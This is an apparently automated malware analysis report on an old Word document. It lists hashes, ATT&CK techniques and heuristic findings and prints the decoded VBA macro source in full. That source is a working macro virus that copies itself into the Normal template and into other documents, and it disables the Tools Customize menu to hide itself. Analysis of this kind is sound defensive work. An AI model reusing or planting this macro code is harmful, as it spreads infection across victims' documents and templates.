Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 feb69a112434e677…

MALICIOUS

Office (OLE)

Size: 28.5 KB
Created: 1997-09-17 03:18:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: a283c687dd0db3cc7ce3cea28081f875
SHA-1: 793e67bbf8cde93fa4cf1dbf9e6298a0c26b6e6c
SHA-256: feb69a112434e67751be03ec59c01410b09096fd4e23b6a5ec019f408cdc178e
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a legacy Word document containing both AutoOpen and AutoClose VBA macros. The AutoClose macro checks whether a module named "Модуль1" already exists in the Normal template and in the active document, and uses Application.OrganizerCopy to copy it wherever it is missing, indicating an attempt to establish persistence (via Normal.dot) and to propagate into other documents. The AutoOpen macro simply calls AutoClose, ensuring execution as soon as the document is opened. The presence of these macros and their self-propagation behavior strongly suggests downloader or dropper functionality, though no specific payload URLs or hashes were extracted.

Heuristics 4

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1460 bytes
SHA-256: dec6953b17c7d18ffed92cf95788a7b53d2c356b74272d2dcbf1a4fc988df1bf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Модуль1"
Sub AutoClose()
ActiveDocument.Save
'On Error GoTo 10
'Application.OrganizerCopy Source:=Word.MacroContainer, Destination:=NormalTemplate.Name, Name:="Модуль1", Object:=wdOrganizerObjectProjectItems
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents.Item(i).Name = "Модуль1" Then
installn = 1
Exit For
Else
installn = 0
End If
Next
For t = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents.Item(t).Name = "Модуль1" Then
Installdoc = 1
Exit For
Else
Installdoc = 0
End If
Next
If Installdoc = 0 Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Модуль1", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
End If
If installn = 0 Then
Application.OrganizerCopy Source:=Word.MacroContainer, Destination:=NormalTemplate.FullName, Name:="Модуль1", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
End If
End Sub
Sub AutoOpen()
AutoClose
End Sub
Sub Tools_Customize()
MsgBox "Error"
End Sub